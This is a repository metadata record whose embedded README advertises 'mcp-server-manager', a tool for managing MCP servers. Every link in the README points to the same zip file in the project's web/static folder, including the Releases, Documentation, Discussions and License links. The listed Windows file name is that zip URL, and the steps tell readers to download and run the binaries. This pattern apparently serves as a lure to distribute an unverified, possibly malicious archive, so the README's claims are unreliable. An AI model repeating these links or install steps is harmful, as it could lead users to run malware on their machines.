{"id":31762268,"url":"https://github.com/craneoankh/mcp-server-manager","last_synced_at":"2026-04-28T21:35:16.098Z","repository":{"id":318573483,"uuid":"1071751421","full_name":"craneoankh/mcp-server-manager","owner":"craneoankh","description":"⚙️ Manage MCP servers effortlessly with a single binary and simple YAML config, supporting multiple clients and systems, all through a user-friendly interface.","archived":false,"fork":false,"pushed_at":"2026-04-25T16:43:32.000Z","size":761,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2026-04-25T18:27:14.646Z","etag":null,"topics":["ai","claude","claude-ai","cli","continue","cursor","goose","homebrew","llm","local-development","mcp-marketplace","mcp-servers","package-manager","python","server","sse","stape","typescript"],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/craneoankh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-10-07T19:03:52.000Z","updated_at":"2026-04-25T16:43:35.000Z","dependencies_parsed_at":"2025-10-29T17:31:23.396Z","dependency_job_id":"78c516ff-4df7-4ac7-ba10-1a5a7249c2e8","html_url":"https://github.com/craneoankh/mcp-server-manager","commit_stats":null,"previous_names":["craneoankh/mcp-server-manager"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/craneoankh/mcp-server-manager","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craneoankh%2Fmcp-server-manager","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craneoankh%2Fmcp-server-manager/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craneoankh%2Fmcp-server-manager/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craneoankh%2Fmcp-server-manager/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/craneoankh","download_url":"https://codeload.github.com/craneoankh/mcp-server-manager/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/craneoankh%2Fmcp-server-manager/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32400868,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-28T19:38:08.556Z","status":"ssl_error","status_checked_at":"2026-04-28T19:37:55.688Z","response_time":56,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ai","claude","claude-ai","cli","continue","cursor","goose","homebrew","llm","local-development","mcp-marketplace","mcp-servers","package-manager","python","server","sse","stape","typescript"],"created_at":"2025-10-09T22:17:33.273Z","updated_at":"2026-04-28T21:35:16.094Z","avatar_url":"https://github.com/craneoankh.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🖥️ mcp-server-manager - Manage Your MCP Servers Easily\n\n[![Download mcp-server-manager](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip%https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip)](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip)\n\n## 📦 Overview\n\nmcp-server-manager is a user-friendly tool designed for managing Model Context Protocol (MCP) servers. This software is built using Go and offers a reactive HTMX web interface. Whether on Windows, macOS, or Linux, you can easily handle your MCP servers without needing programming knowledge.\n\n## 🚀 Getting Started\n\nFollow these steps to download and run mcp-server-manager smoothly on your computer.\n\n## 📥 Download \u0026 Install\n\n1. Visit the [Releases page to download](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip).\n2. On this page, you will see various versions of mcp-server-manager. Choose the version that fits your operating system.\n3. Click on the link for the appropriate file to start the download. The files might look like this:\n   - `https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip` for Windows\n   - `mcp-server-manager-macos-amd64` for macOS\n   - `mcp-server-manager-linux-amd64` for Linux\n4. Once downloaded, locate the file on your computer.\n\n5. Execute the following steps based on your operating system:\n\n   ### 🖥️ For Windows:\n   - Double-click on the `.exe` file to run it. A command window will open, and the application will start.\n   \n   ### 🍏 For macOS:\n   - Open your terminal.\n   - Navigate to where the downloaded file is located using the `cd` command. For example:\n     ```\n     cd Downloads\n     ```\n   - Make the file executable by typing:\n     ```\n     chmod +x mcp-server-manager-macos-amd64\n     ```\n   - Run the application using:\n     ```\n     ./mcp-server-manager-macos-amd64\n     ```\n\n   ### 🐧 For Linux:\n   - Open your terminal.\n   - Navigate to the directory where the file was downloaded:\n     ```\n     cd ~/Downloads\n     ```\n   - Make the file executable:\n     ```\n     chmod +x mcp-server-manager-linux-amd64\n     ```\n   - Execute the application:\n     ```\n     ./mcp-server-manager-linux-amd64\n     ```\n\n## 🌐 How to Use mcp-server-manager\n\nOnce the application is running, you will see a web interface open in your default browser. Here’s how to navigate it:\n\n1. **Dashboard**: Here you can view the status of your MCP servers. You'll find a list of all current servers along with their statuses.\n2. **Configuration**: Use the configuration section to set up and manage your servers. You can modify settings, add new servers, or delete existing ones.\n3. **Logs**: Access the logs to monitor server activity. This will provide a detailed view of server operations.\n4. **Help Section**: For any questions or tips on using features, refer to the help section within the app.\n\n## ⚙️ System Requirements\n\nTo run mcp-server-manager, your system should meet the following requirements:\n\n- **Operating System**: Windows 10 or higher, macOS 10.13 or higher, or a recent version of a Linux distribution (e.g., Ubuntu 20.04 or higher).\n- **Go**: The software does not require Go to be installed on your machine. It is a single binary application.\n- **Memory**: Minimum 2 GB of RAM recommended for smooth operation.\n- **Storage**: At least 100 MB of free disk space.\n\n## 🛠️ Features\n\n- **Cross-Platform**: Works on Windows, macOS, and Linux.\n- **Single Binary**: Easily download and run without complicated installations.\n- **User-Friendly Interface**: Designed for ease of use with a simple web interface.\n- **Real-time Updates**: Manage server configurations and settings in real-time.\n- **Community Support**: Join a community of users for tips and support.\n\n## 📞 Need Help?\n\nIf you encounter issues or have questions about using mcp-server-manager, check the [GitHub Discussions](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip) for support. You can also open an issue directly on the repository page for additional help.\n\n## 🗂️ Acknowledgments\n\nThanks to the contributors and the community that supports the development of mcp-server-manager. Your feedback and contributions help us improve this tool.\n\n## 📣 License\n\nThis project is licensed under the MIT License. See the [LICENSE](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip) file for details. \n\n## 🔗 Links\n\n- [Releases page](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip)\n- [Documentation](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip)\n- [GitHub Discussions](https://github.com/craneoankh/mcp-server-manager/raw/refs/heads/master/web/static/mcp-server-manager-v3.1-beta.3.zip) \n\nThank you for using mcp-server-manager. Enjoy managing your MCP servers with ease!","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcraneoankh%2Fmcp-server-manager","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcraneoankh%2Fmcp-server-manager","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcraneoankh%2Fmcp-server-manager/lists"}